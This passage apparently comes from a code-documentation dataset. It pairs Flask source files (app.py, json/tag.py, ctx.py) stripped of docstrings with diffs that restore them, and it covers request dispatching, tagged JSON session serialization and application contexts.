+ """Does the request dispatching. Matches the URL and returns the
+ return value of the view or error handler. This does not have to
+ be a response object. In order to convert the return value to a
+ proper response object, call :func:`make_response`.
+
+ .. versionchanged:: 0.7
+ This no longer does the exception handling, this code was
+ moved to the new :meth:`full_dispatch_request`.
+ """
req = ctx.request
if req.routing_exception is not None:
@@ -588,6 +990,12 @@ return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
def full_dispatch_request(self, ctx: AppContext) -> Response:
+ """Dispatches the request and on top of that performs request
+ pre and postprocessing as well as HTTP exception catching and
+ error handling.
+
+ .. versionadded:: 0.7
+ """
if not self._got_first_request and self.should_ignore_error is not None:
import warnings
@@ -616,6 +1024,18 @@ rv: ft.ResponseReturnValue | HTTPException,
from_error_handler: bool = False,
) -> Response:
+ """Given the return value from a view function this finalizes
+ the request by converting it into a response and invoking the
+ postprocessing functions. This is invoked for both normal
+ request dispatching as well as error handlers.
+
+ Because this means that it might be called as a result of a
+ failure a special safe mode is available which can be enabled
+ with the `from_error_handler` flag. If enabled, failures in
+ response processing will be logged and otherwise ignored.
+
+ :internal:
+ """
response = self.make_response(rv)
try:
response = self.process_response(ctx, response)
@@ -631,12 +1051,26 @@ return response
def make_default_options_response(self, ctx: AppContext) -> Response:
+ """This method is called to create the default ``OPTIONS`` response.
+ This can be changed through subclassing to change the default
+ behavior of ``OPTIONS`` responses.
+
+ .. versionadded:: 0.7
+ """
methods = ctx.url_adapter.allowed_methods() # type: ignore[union-attr]
rv = self.response_class()
rv.allow.update(methods)
return rv
def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]:
+ """Ensure that the function is synchronous for WSGI workers.
+ Plain ``def`` functions are returned as-is. ``async def``
+ functions are wrapped to run and wait for the response.
+
+ Override this method to change how the app runs async views.
+
+ .. versionadded:: 2.0
+ """
if iscoroutinefunction(func):
return self.async_to_sync(func)
@@ -645,6 +1079,17 @@ def async_to_sync(
self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]]
) -> t.Callable[..., t.Any]:
+ """Return a sync function that will run the coroutine function.
+
+ .. code-block:: python
+
+ result = app.async_to_sync(func)(*args, **kwargs)
+
+ Override this method to change how the app converts async code
+ to be synchronously callable.
+
+ .. versionadded:: 2.0
+ """
try:
from asgiref.sync import async_to_sync as asgiref_async_to_sync
except ImportError:
@@ -665,6 +1110,52 @@ _external: bool | None = None,
**values: t.Any,
) -> str:
+ """Generate a URL to the given endpoint with the given values.
+
+ This is called by :func:`flask.url_for`, and can be called
+ directly as well.
+
+ An *endpoint* is the name of a URL rule, usually added with
+ :meth:`@app.route() <route>`, and usually the same name as the
+ view function. A route defined in a :class:`~flask.Blueprint`
+ will prepend the blueprint's name separated by a ``.`` to the
+ endpoint.
+
+ In some cases, such as email messages, you want URLs to include
+ the scheme and domain, like ``https://example.com/hello``. When
+ not in an active request, URLs will be external by default, but
+ this requires setting :data:`SERVER_NAME` so Flask knows what
+ domain to use. :data:`APPLICATION_ROOT` and
+ :data:`PREFERRED_URL_SCHEME` should also be configured as
+ needed. This config is only used when not in an active request.
+
+ Functions can be decorated with :meth:`url_defaults` to modify
+ keyword arguments before the URL is built.
+
+ If building fails for some reason, such as an unknown endpoint
+ or incorrect values, the app's :meth:`handle_url_build_error`
+ method is called. If that returns a string, that is returned,
+ otherwise a :exc:`~werkzeug.routing.BuildError` is raised.
+
+ :param endpoint: The endpoint name associated with the URL to
+ generate. If this starts with a ``.``, the current blueprint
+ name (if any) will be used.
+ :param _anchor: If given, append this as ``#anchor`` to the URL.
+ :param _method: If given, generate the URL associated with this
+ method for the endpoint.
+ :param _scheme: If given, the URL will have this scheme if it
+ is external.
+ :param _external: If given, prefer the URL to be internal
+ (False) or require it to be external (True). External URLs
+ include the scheme and domain. When not in an active
+ request, URLs are external by default.
+ :param values: Values to use for the variable parts of the URL
+ rule. Unknown keys are appended as query string arguments,
+ like ``?a=b&c=d``.
+
+ .. versionadded:: 2.2
+ Moved from ``flask.url_for``, which calls this method.
+ """
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
url_adapter = ctx.url_adapter
blueprint_name = ctx.request.blueprint
@@ -731,6 +1222,61 @@ return rv
def make_response(self, rv: ft.ResponseReturnValue) -> Response:
+ """Convert the return value from a view function to an instance of
+ :attr:`response_class`.
+
+ :param rv: the return value from the view function. The view function
+ must return a response. Returning ``None``, or the view ending
+ without returning, is not allowed. The following types are allowed
+ for ``view_rv``:
+
+ ``str``
+ A response object is created with the string encoded to UTF-8
+ as the body.
+
+ ``bytes``
+ A response object is created with the bytes as the body.
+
+ ``dict``
+ A dictionary that will be jsonify'd before being returned.
+
+ ``list``
+ A list that will be jsonify'd before being returned.
+
+ ``generator`` or ``iterator``
+ A generator that returns ``str`` or ``bytes`` to be
+ streamed as the response.
+
+ ``tuple``
+ Either ``(body, status, headers)``, ``(body, status)``, or
+ ``(body, headers)``, where ``body`` is any of the other types
+ allowed here, ``status`` is a string or an integer, and
+ ``headers`` is a dictionary or a list of ``(key, value)``
+ tuples. If ``body`` is a :attr:`response_class` instance,
+ ``status`` overwrites the exiting value and ``headers`` are
+ extended.
+
+ :attr:`response_class`
+ The object is returned unchanged.
+
+ other :class:`~werkzeug.wrappers.Response` class
+ The object is coerced to :attr:`response_class`.
+
+ :func:`callable`
+ The function is called as a WSGI application. The result is
+ used to create a response object.
+
+ .. versionchanged:: 2.2
+ A generator will be converted to a streaming response.
+ A list will be converted to a JSON response.
+
+ .. versionchanged:: 1.1
+ A dict will be converted to a JSON response.
+
+ .. versionchanged:: 0.9
+ Previously a tuple was interpreted as the arguments for the
+ response object.
+ """
status: int | None = None
headers: HeadersValue | None = None
@@ -818,6 +1364,15 @@ return rv
def preprocess_request(self, ctx: AppContext) -> ft.ResponseReturnValue | None:
+ """Called before the request is dispatched. Calls
+ :attr:`url_value_preprocessors` registered with the app and the
+ current blueprint (if any). Then calls :attr:`before_request_funcs`
+ registered with the app and the blueprint.
+
+ If any :meth:`before_request` handler returns a non-None value, the
+ value is handled as if it was the return value from the view, and
+ further request handling is stopped.
+ """
req = ctx.request
names = (None, *reversed(req.blueprints))
@@ -837,6 +1392,18 @@ return None
def process_response(self, ctx: AppContext, response: Response) -> Response:
+ """Can be overridden in order to modify the response object
+ before it's sent to the WSGI server. By default this will
+ call all the :meth:`after_request` decorated functions.
+
+ .. versionchanged:: 0.5
+ As of Flask 0.5 the functions registered for after request
+ execution are called in reverse order of registration.
+
+ :param response: a :attr:`response_class` object.
+ :return: a new response object or the same, has to be an
+ instance of :attr:`response_class`.
+ """
for func in ctx._after_request_functions:
response = self.ensure_sync(func)(response)
@@ -853,6 +1420,23 @@ def do_teardown_request(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
+ """Called after the request is dispatched and the response is finalized,
+ right before the request context is popped. Called by
+ :meth:`.AppContext.pop`.
+
+ This calls all functions decorated with :meth:`teardown_request`, and
+ :meth:`Blueprint.teardown_request` if a blueprint handled the request.
+ Finally, the :data:`request_tearing_down` signal is sent.
+
+ :param exc: An unhandled exception raised while dispatching the request.
+ Passed to each teardown function.
+
+ .. versionchanged:: 3.2
+ All callbacks are called rather than stopping on the first error.
+
+ .. versionchanged:: 0.9
+ Added the ``exc`` argument.
+ """
collect_errors = _CollectErrors()
for name in chain(ctx.request.blueprints, (None,)):
@@ -869,6 +1453,20 @@ def do_teardown_appcontext(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
+ """Called right before the application context is popped. Called by
+ :meth:`.AppContext.pop`.
+
+ This calls all functions decorated with :meth:`teardown_appcontext`.
+ Then the :data:`appcontext_tearing_down` signal is sent.
+
+ :param exc: An unhandled exception raised while the context was active.
+ Passed to each teardown function.
+
+ .. versionchanged:: 3.2
+ All callbacks are called rather than stopping on the first error.
+
+ .. versionadded:: 0.9
+ """
collect_errors = _CollectErrors()
for func in reversed(self.teardown_appcontext_funcs):
@@ -881,12 +1479,79 @@ collect_errors.raise_any("Errors during app teardown")
def app_context(self) -> AppContext:
+ """Create an :class:`.AppContext`. When the context is pushed,
+ :data:`.current_app` and :data:`.g` become available.
+
+ A context is automatically pushed when handling each request, and when
+ running any ``flask`` CLI command. Use this as a ``with`` block to
+ manually push a context outside of those situations, such as during
+ setup or testing.
+
+ .. code-block:: python
+
+ with app.app_context():
+ init_db()
+
+ See :doc:`/appcontext`.
+
+ .. versionadded:: 0.9
+ """
return AppContext(self)
def request_context(self, environ: WSGIEnvironment) -> AppContext:
+ """Create an :class:`.AppContext` with request information representing
+ the given WSGI environment. A context is automatically pushed when
+ handling each request. When the context is pushed, :data:`.request`,
+ :data:`.session`, :data:`g:, and :data:`.current_app` become available.
+
+ This method should not be used in your own code. Creating a valid WSGI
+ environ is not trivial. Use :meth:`test_request_context` to correctly
+ create a WSGI environ and request context instead.
+
+ See :doc:`/appcontext`.
+
+ :param environ: A WSGI environment.
+ """
return AppContext.from_environ(self, environ)
def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> AppContext:
+ """Create an :class:`.AppContext` with request information created from
+ the given arguments. When the context is pushed, :data:`.request`,
+ :data:`.session`, :data:`g:, and :data:`.current_app` become available.
+
+ This is useful during testing to run a function that uses request data
+ without dispatching a full request. Use this as a ``with`` block to push
+ a context.
+
+ .. code-block:: python
+
+ with app.test_request_context(...):
+ generate_report()
+
+ See :doc:`/appcontext`.
+
+ Takes the same arguments as Werkzeug's
+ :class:`~werkzeug.test.EnvironBuilder`, with some defaults from
+ the application. See the linked Werkzeug docs for most of the
+ available arguments. Flask-specific behavior is listed here.
+
+ :param path: URL path being requested.
+ :param base_url: Base URL where the app is being served, which
+ ``path`` is relative to. If not given, built from
+ :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`,
+ and :data:`APPLICATION_ROOT`.
+ :param subdomain: Subdomain name to prepend to :data:`SERVER_NAME`.
+ :param url_scheme: Scheme to use instead of
+ :data:`PREFERRED_URL_SCHEME`.
+ :param data: The request body text or bytes,or a dict of form data.
+ :param json: If given, this is serialized as JSON and passed as
+ ``data``. Also defaults ``content_type`` to
+ ``application/json``.
+ :param args: Other positional arguments passed to
+ :class:`~werkzeug.test.EnvironBuilder`.
+ :param kwargs: Other keyword arguments passed to
+ :class:`~werkzeug.test.EnvironBuilder`.
+ """
from .testing import EnvironBuilder
builder = EnvironBuilder(self, *args, **kwargs)
@@ -901,6 +1566,29 @@ def wsgi_app(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
+ """The actual WSGI application. This is not implemented in
+ :meth:`__call__` so that middlewares can be applied without
+ losing a reference to the app object. Instead of doing this::
+
+ app = MyMiddleware(app)
+
+ It's a better idea to do this instead::
+
+ app.wsgi_app = MyMiddleware(app.wsgi_app)
+
+ Then you still have the original application object around and
+ can continue to call methods on it.
+
+ .. versionchanged:: 0.7
+ Teardown events for the request and app contexts are called
+ even if an unhandled error occurs. Other events may not be
+ called depending on when an error occurs during dispatch.
+
+ :param environ: A WSGI environment.
+ :param start_response: A callable accepting a status code,
+ a list of headers, and an optional exception context to
+ start the response.
+ """
ctx = self.request_context(environ)
error: BaseException | None = None
try:
@@ -930,4 +1618,8 @@ def __call__(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
- return self.wsgi_app(environ, start_response)+ """The WSGI server calls the Flask application object as the
+ WSGI application. This calls :meth:`wsgi_app`, which can be
+ wrapped to apply middleware.
+ """
+ return self.wsgi_app(environ, start_response)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/app.py |
Write docstrings for backend logic |
from __future__ import annotations
import typing as t
from base64 import b64decode
from base64 import b64encode
from datetime import datetime
from uuid import UUID
from markupsafe import Markup
from werkzeug.http import http_date
from werkzeug.http import parse_date
from ..json import dumps
from ..json import loads
class JSONTag:
__slots__ = ("serializer",)
#: The tag to mark the serialized object with. If empty, this tag is
#: only used as an intermediate step during tagging.
key: str = ""
def __init__(self, serializer: TaggedJSONSerializer) -> None:
self.serializer = serializer
def check(self, value: t.Any) -> bool:
raise NotImplementedError
def to_json(self, value: t.Any) -> t.Any:
raise NotImplementedError
def to_python(self, value: t.Any) -> t.Any:
raise NotImplementedError
def tag(self, value: t.Any) -> dict[str, t.Any]:
return {self.key: self.to_json(value)}
class TagDict(JSONTag):
__slots__ = ()
key = " di"
def check(self, value: t.Any) -> bool:
return (
isinstance(value, dict)
and len(value) == 1
and next(iter(value)) in self.serializer.tags
)
def to_json(self, value: t.Any) -> t.Any:
key = next(iter(value))
return {f"{key}__": self.serializer.tag(value[key])}
def to_python(self, value: t.Any) -> t.Any:
key = next(iter(value))
return {key[:-2]: value[key]}
class PassDict(JSONTag):
__slots__ = ()
def check(self, value: t.Any) -> bool:
return isinstance(value, dict)
def to_json(self, value: t.Any) -> t.Any:
# JSON objects may only have string keys, so don't bother tagging the
# key here.
return {k: self.serializer.tag(v) for k, v in value.items()}
tag = to_json
class TagTuple(JSONTag):
__slots__ = ()
key = " t"
def check(self, value: t.Any) -> bool:
return isinstance(value, tuple)
def to_json(self, value: t.Any) -> t.Any:
return [self.serializer.tag(item) for item in value]
def to_python(self, value: t.Any) -> t.Any:
return tuple(value)
class PassList(JSONTag):
__slots__ = ()
def check(self, value: t.Any) -> bool:
return isinstance(value, list)
def to_json(self, value: t.Any) -> t.Any:
return [self.serializer.tag(item) for item in value]
tag = to_json
class TagBytes(JSONTag):
__slots__ = ()
key = " b"
def check(self, value: t.Any) -> bool:
return isinstance(value, bytes)
def to_json(self, value: t.Any) -> t.Any:
return b64encode(value).decode("ascii")
def to_python(self, value: t.Any) -> t.Any:
return b64decode(value)
class TagMarkup(JSONTag):
__slots__ = ()
key = " m"
def check(self, value: t.Any) -> bool:
return callable(getattr(value, "__html__", None))
def to_json(self, value: t.Any) -> t.Any:
return str(value.__html__())
def to_python(self, value: t.Any) -> t.Any:
return Markup(value)
class TagUUID(JSONTag):
__slots__ = ()
key = " u"
def check(self, value: t.Any) -> bool:
return isinstance(value, UUID)
def to_json(self, value: t.Any) -> t.Any:
return value.hex
def to_python(self, value: t.Any) -> t.Any:
return UUID(value)
class TagDateTime(JSONTag):
__slots__ = ()
key = " d"
def check(self, value: t.Any) -> bool:
return isinstance(value, datetime)
def to_json(self, value: t.Any) -> t.Any:
return http_date(value)
def to_python(self, value: t.Any) -> t.Any:
return parse_date(value)
class TaggedJSONSerializer:
__slots__ = ("tags", "order")
#: Tag classes to bind when creating the serializer. Other tags can be
#: added later using :meth:`~register`.
default_tags = [
TagDict,
PassDict,
TagTuple,
PassList,
TagBytes,
TagMarkup,
TagUUID,
TagDateTime,
]
def __init__(self) -> None:
self.tags: dict[str, JSONTag] = {}
self.order: list[JSONTag] = []
for cls in self.default_tags:
self.register(cls)
def register(
self,
tag_class: type[JSONTag],
force: bool = False,
index: int | None = None,
) -> None:
tag = tag_class(self)
key = tag.key
if key:
if not force and key in self.tags:
raise KeyError(f"Tag '{key}' is already registered.")
self.tags[key] = tag
if index is None:
self.order.append(tag)
else:
self.order.insert(index, tag)
def tag(self, value: t.Any) -> t.Any:
for tag in self.order:
if tag.check(value):
return tag.tag(value)
return value
def untag(self, value: dict[str, t.Any]) -> t.Any:
if len(value) != 1:
return value
key = next(iter(value))
if key not in self.tags:
return value
return self.tags[key].to_python(value[key])
def _untag_scan(self, value: t.Any) -> t.Any:
if isinstance(value, dict):
# untag each item recursively
value = {k: self._untag_scan(v) for k, v in value.items()}
# untag the dict itself
value = self.untag(value)
elif isinstance(value, list):
# untag each item recursively
value = [self._untag_scan(item) for item in value]
return value
def dumps(self, value: t.Any) -> str:
return dumps(self.tag(value), separators=(",", ":"))
def loads(self, value: str) -> t.Any:
return self._untag_scan(loads(value)) | --- +++ @@ -1,3 +1,45 @@+"""
+Tagged JSON
+~~~~~~~~~~~
+
+A compact representation for lossless serialization of non-standard JSON
+types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this
+to serialize the session data, but it may be useful in other places. It
+can be extended to support other types.
+
+.. autoclass:: TaggedJSONSerializer
+ :members:
+
+.. autoclass:: JSONTag
+ :members:
+
+Let's see an example that adds support for
+:class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so
+to handle this we will dump the items as a list of ``[key, value]``
+pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to
+identify the type. The session serializer processes dicts first, so
+insert the new tag at the front of the order since ``OrderedDict`` must
+be processed before ``dict``.
+
+.. code-block:: python
+
+ from flask.json.tag import JSONTag
+
+ class TagOrderedDict(JSONTag):
+ __slots__ = ('serializer',)
+ key = ' od'
+
+ def check(self, value):
+ return isinstance(value, OrderedDict)
+
+ def to_json(self, value):
+ return [[k, self.serializer.tag(v)] for k, v in iteritems(value)]
+
+ def to_python(self, value):
+ return OrderedDict(value)
+
+ app.session_interface.serializer.register(TagOrderedDict, index=0)
+"""
from __future__ import annotations
@@ -16,6 +58,7 @@
class JSONTag:
+ """Base class for defining type tags for :class:`TaggedJSONSerializer`."""
__slots__ = ("serializer",)
@@ -24,22 +67,35 @@ key: str = ""
def __init__(self, serializer: TaggedJSONSerializer) -> None:
+ """Create a tagger for the given serializer."""
self.serializer = serializer
def check(self, value: t.Any) -> bool:
+ """Check if the given value should be tagged by this tag."""
raise NotImplementedError
def to_json(self, value: t.Any) -> t.Any:
+ """Convert the Python object to an object that is a valid JSON type.
+ The tag will be added later."""
raise NotImplementedError
def to_python(self, value: t.Any) -> t.Any:
+ """Convert the JSON representation back to the correct type. The tag
+ will already be removed."""
raise NotImplementedError
def tag(self, value: t.Any) -> dict[str, t.Any]:
+ """Convert the value to a valid JSON type and add the tag structure
+ around it."""
return {self.key: self.to_json(value)}
class TagDict(JSONTag):
+ """Tag for 1-item dicts whose only key matches a registered tag.
+
+ Internally, the dict key is suffixed with `__`, and the suffix is removed
+ when deserializing.
+ """
__slots__ = ()
key = " di"
@@ -115,6 +171,9 @@
class TagMarkup(JSONTag):
+ """Serialize anything matching the :class:`~markupsafe.Markup` API by
+ having a ``__html__`` method to the result of that method. Always
+ deserializes to an instance of :class:`~markupsafe.Markup`."""
__slots__ = ()
key = " m"
@@ -158,6 +217,19 @@
class TaggedJSONSerializer:
+ """Serializer that uses a tag system to compactly represent objects that
+ are not JSON types. Passed as the intermediate serializer to
+ :class:`itsdangerous.Serializer`.
+
+ The following extra types are supported:
+
+ * :class:`dict`
+ * :class:`tuple`
+ * :class:`bytes`
+ * :class:`~markupsafe.Markup`
+ * :class:`~uuid.UUID`
+ * :class:`~datetime.datetime`
+ """
__slots__ = ("tags", "order")
@@ -187,6 +259,19 @@ force: bool = False,
index: int | None = None,
) -> None:
+ """Register a new tag with this serializer.
+
+ :param tag_class: tag class to register. Will be instantiated with this
+ serializer instance.
+ :param force: overwrite an existing tag. If false (default), a
+ :exc:`KeyError` is raised.
+ :param index: index to insert the new tag in the tag order. Useful when
+ the new tag is a special case of an existing tag. If ``None``
+ (default), the tag is appended to the end of the order.
+
+ :raise KeyError: if the tag key is already registered and ``force`` is
+ not true.
+ """
tag = tag_class(self)
key = tag.key
@@ -202,6 +287,7 @@ self.order.insert(index, tag)
def tag(self, value: t.Any) -> t.Any:
+ """Convert a value to a tagged representation if necessary."""
for tag in self.order:
if tag.check(value):
return tag.tag(value)
@@ -209,6 +295,7 @@ return value
def untag(self, value: dict[str, t.Any]) -> t.Any:
+ """Convert a tagged representation back to the original type."""
if len(value) != 1:
return value
@@ -232,7 +319,9 @@ return value
def dumps(self, value: t.Any) -> str:
+ """Tag the value and dump it to a compact JSON string."""
return dumps(self.tag(value), separators=(",", ":"))
def loads(self, value: str) -> t.Any:
- return self._untag_scan(loads(value))+ """Load data from a JSON string and deserialized any tagged objects."""
+ return self._untag_scan(loads(value))
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/tag.py |
Add detailed documentation for each class | from __future__ import annotations
import contextvars
import typing as t
from functools import update_wrapper
from types import TracebackType
from werkzeug.exceptions import HTTPException
from werkzeug.routing import MapAdapter
from . import typing as ft
from .globals import _cv_app
from .helpers import _CollectErrors
from .signals import appcontext_popped
from .signals import appcontext_pushed
if t.TYPE_CHECKING:
import typing_extensions as te
from _typeshed.wsgi import WSGIEnvironment
from .app import Flask
from .sessions import SessionMixin
from .wrappers import Request
# a singleton sentinel value for parameter defaults
_sentinel = object()
class _AppCtxGlobals:
# Define attr methods to let mypy know this is a namespace object
# that has arbitrary attributes.
def __getattr__(self, name: str) -> t.Any:
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name) from None
def __setattr__(self, name: str, value: t.Any) -> None:
self.__dict__[name] = value
def __delattr__(self, name: str) -> None:
try:
del self.__dict__[name]
except KeyError:
raise AttributeError(name) from None
def get(self, name: str, default: t.Any | None = None) -> t.Any:
return self.__dict__.get(name, default)
def pop(self, name: str, default: t.Any = _sentinel) -> t.Any:
if default is _sentinel:
return self.__dict__.pop(name)
else:
return self.__dict__.pop(name, default)
def setdefault(self, name: str, default: t.Any = None) -> t.Any:
return self.__dict__.setdefault(name, default)
def __contains__(self, item: str) -> bool:
return item in self.__dict__
def __iter__(self) -> t.Iterator[str]:
return iter(self.__dict__)
def __repr__(self) -> str:
ctx = _cv_app.get(None)
if ctx is not None:
return f"<flask.g of '{ctx.app.name}'>"
return object.__repr__(self)
def after_this_request(
f: ft.AfterRequestCallable[t.Any],
) -> ft.AfterRequestCallable[t.Any]:
ctx = _cv_app.get(None)
if ctx is None or not ctx.has_request:
raise RuntimeError(
"'after_this_request' can only be used when a request"
" context is active, such as in a view function."
)
ctx._after_request_functions.append(f)
return f
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
def copy_current_request_context(f: F) -> F:
ctx = _cv_app.get(None)
if ctx is None:
raise RuntimeError(
"'copy_current_request_context' can only be used when a"
" request context is active, such as in a view function."
)
ctx = ctx.copy()
def wrapper(*args: t.Any, **kwargs: t.Any) -> t.Any:
with ctx:
return ctx.app.ensure_sync(f)(*args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
def has_request_context() -> bool:
return (ctx := _cv_app.get(None)) is not None and ctx.has_request
def has_app_context() -> bool:
return _cv_app.get(None) is not None
class AppContext:
def __init__(
self,
app: Flask,
*,
request: Request | None = None,
session: SessionMixin | None = None,
) -> None:
self.app = app
"""The application represented by this context. Accessed through
:data:`.current_app`.
"""
self.g: _AppCtxGlobals = app.app_ctx_globals_class()
"""The global data for this context. Accessed through :data:`.g`."""
self.url_adapter: MapAdapter | None = None
"""The URL adapter bound to the request, or the app if not in a request.
May be ``None`` if binding failed.
"""
self._request: Request | None = request
self._session: SessionMixin | None = session
self._flashes: list[tuple[str, str]] | None = None
self._after_request_functions: list[ft.AfterRequestCallable[t.Any]] = []
try:
self.url_adapter = app.create_url_adapter(self._request)
except HTTPException as e:
if self._request is not None:
self._request.routing_exception = e
self._cv_token: contextvars.Token[AppContext] | None = None
"""The previous state to restore when popping."""
self._push_count: int = 0
"""Track nested pushes of this context. Cleanup will only run once the
original push has been popped.
"""
@classmethod
def from_environ(cls, app: Flask, environ: WSGIEnvironment, /) -> te.Self:
request = app.request_class(environ)
request.json_module = app.json
return cls(app, request=request)
@property
def has_request(self) -> bool:
return self._request is not None
def copy(self) -> te.Self:
return self.__class__(
self.app,
request=self._request,
session=self._session,
)
@property
def request(self) -> Request:
if self._request is None:
raise RuntimeError("There is no request in this context.")
return self._request
def _get_session(self) -> SessionMixin:
if self._request is None:
raise RuntimeError("There is no request in this context.")
if self._session is None:
si = self.app.session_interface
self._session = si.open_session(self.app, self.request)
if self._session is None:
self._session = si.make_null_session(self.app)
return self._session
@property
def session(self) -> SessionMixin:
session = self._get_session()
session.accessed = True
return session
def match_request(self) -> None:
try:
result = self.url_adapter.match(return_rule=True) # type: ignore[union-attr]
except HTTPException as e:
self._request.routing_exception = e # type: ignore[union-attr]
else:
self._request.url_rule, self._request.view_args = result # type: ignore[union-attr]
def push(self) -> None:
self._push_count += 1
if self._cv_token is not None:
return
self._cv_token = _cv_app.set(self)
appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync)
if self._request is not None:
# Open the session at the moment that the request context is available.
# This allows a custom open_session method to use the request context.
self._get_session()
# Match the request URL after loading the session, so that the
# session is available in custom URL converters.
if self.url_adapter is not None:
self.match_request()
def pop(self, exc: BaseException | None = None) -> None:
if self._cv_token is None:
raise RuntimeError(f"Cannot pop this context ({self!r}), it is not pushed.")
ctx = _cv_app.get(None)
if ctx is None or self._cv_token is None:
raise RuntimeError(
f"Cannot pop this context ({self!r}), there is no active context."
)
if ctx is not self:
raise RuntimeError(
f"Cannot pop this context ({self!r}), it is not the active"
f" context ({ctx!r})."
)
self._push_count -= 1
if self._push_count > 0:
return
collect_errors = _CollectErrors()
if self._request is not None:
with collect_errors:
self.app.do_teardown_request(self, exc)
with collect_errors:
self._request.close()
with collect_errors:
self.app.do_teardown_appcontext(self, exc)
_cv_app.reset(self._cv_token)
self._cv_token = None
with collect_errors:
appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync)
collect_errors.raise_any("Errors during context teardown")
def __enter__(self) -> te.Self:
self.push()
return self
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_value: BaseException | None,
tb: TracebackType | None,
) -> None:
self.pop(exc_value)
def __repr__(self) -> str:
if self._request is not None:
return (
f"<{type(self).__name__} {id(self)} of {self.app.name},"
f" {self.request.method} {self.request.url!r}>"
)
return f"<{type(self).__name__} {id(self)} of {self.app.name}>"
def __getattr__(name: str) -> t.Any:
import warnings
if name == "RequestContext":
warnings.warn(
"'RequestContext' has merged with 'AppContext', and will be removed"
" in Flask 4.0. Use 'AppContext' instead.",
DeprecationWarning,
stacklevel=2,
)
return AppContext
raise AttributeError(name) | --- +++ @@ -28,6 +28,24 @@
class _AppCtxGlobals:
+ """A plain object. Used as a namespace for storing data during an
+ application context.
+
+ Creating an app context automatically creates this object, which is
+ made available as the :data:`.g` proxy.
+
+ .. describe:: 'key' in g
+
+ Check whether an attribute is present.
+
+ .. versionadded:: 0.10
+
+ .. describe:: iter(g)
+
+ Return an iterator over the attribute names.
+
+ .. versionadded:: 0.10
+ """
# Define attr methods to let mypy know this is a namespace object
# that has arbitrary attributes.
@@ -48,15 +66,40 @@ raise AttributeError(name) from None
def get(self, name: str, default: t.Any | None = None) -> t.Any:
+ """Get an attribute by name, or a default value. Like
+ :meth:`dict.get`.
+
+ :param name: Name of attribute to get.
+ :param default: Value to return if the attribute is not present.
+
+ .. versionadded:: 0.10
+ """
return self.__dict__.get(name, default)
def pop(self, name: str, default: t.Any = _sentinel) -> t.Any:
+ """Get and remove an attribute by name. Like :meth:`dict.pop`.
+
+ :param name: Name of attribute to pop.
+ :param default: Value to return if the attribute is not present,
+ instead of raising a ``KeyError``.
+
+ .. versionadded:: 0.11
+ """
if default is _sentinel:
return self.__dict__.pop(name)
else:
return self.__dict__.pop(name, default)
def setdefault(self, name: str, default: t.Any = None) -> t.Any:
+ """Get the value of an attribute if it is present, otherwise
+ set and return a default value. Like :meth:`dict.setdefault`.
+
+ :param name: Name of attribute to get.
+ :param default: Value to set and return if the attribute is not
+ present.
+
+ .. versionadded:: 0.11
+ """
return self.__dict__.setdefault(name, default)
def __contains__(self, item: str) -> bool:
@@ -75,6 +118,24 @@ def after_this_request(
f: ft.AfterRequestCallable[t.Any],
) -> ft.AfterRequestCallable[t.Any]:
+ """Decorate a function to run after the current request. The behavior is the
+ same as :meth:`.Flask.after_request`, except it only applies to the current
+ request, rather than every request. Therefore, it must be used within a
+ request context, rather than during setup.
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ @after_this_request
+ def add_header(response):
+ response.headers["X-Foo"] = "Parachute"
+ return response
+
+ return "Hello, World!"
+
+ .. versionadded:: 0.9
+ """
ctx = _cv_app.get(None)
if ctx is None or not ctx.has_request:
@@ -91,6 +152,43 @@
def copy_current_request_context(f: F) -> F:
+ """Decorate a function to run inside the current request context. This can
+ be used when starting a background task, otherwise it will not see the app
+ and request objects that were active in the parent.
+
+ .. warning::
+
+ Due to the following caveats, it is often safer (and simpler) to pass
+ the data you need when starting the task, rather than using this and
+ relying on the context objects.
+
+ In order to avoid execution switching partially though reading data, either
+ read the request body (access ``form``, ``json``, ``data``, etc) before
+ starting the task, or use a lock. This can be an issue when using threading,
+ but shouldn't be an issue when using greenlet/gevent or asyncio.
+
+ If the task will access ``session``, be sure to do so in the parent as well
+ so that the ``Vary: cookie`` header will be set. Modifying ``session`` in
+ the task should be avoided, as it may execute after the response cookie has
+ already been written.
+
+ .. code-block:: python
+
+ import gevent
+ from flask import copy_current_request_context
+
+ @app.route('/')
+ def index():
+ @copy_current_request_context
+ def do_some_work():
+ # do some work here, it can access flask.request or
+ # flask.session like you would otherwise in the view function.
+ ...
+ gevent.spawn(do_some_work)
+ return 'Regular response'
+
+ .. versionadded:: 0.10
+ """
ctx = _cv_app.get(None)
if ctx is None:
@@ -109,14 +207,95 @@
def has_request_context() -> bool:
+ """Test if an app context is active and if it has request information.
+
+ .. code-block:: python
+
+ from flask import has_request_context, request
+
+ if has_request_context():
+ remote_addr = request.remote_addr
+
+ If a request context is active, the :data:`.request` and :data:`.session`
+ context proxies will available and ``True``, otherwise ``False``. You can
+ use that to test the data you use, rather than using this function.
+
+ .. code-block:: python
+
+ from flask import request
+
+ if request:
+ remote_addr = request.remote_addr
+
+ .. versionadded:: 0.7
+ """
return (ctx := _cv_app.get(None)) is not None and ctx.has_request
def has_app_context() -> bool:
+ """Test if an app context is active. Unlike :func:`has_request_context`
+ this can be true outside a request, such as in a CLI command.
+
+ .. code-block:: python
+
+ from flask import has_app_context, g
+
+ if has_app_context():
+ g.cached_data = ...
+
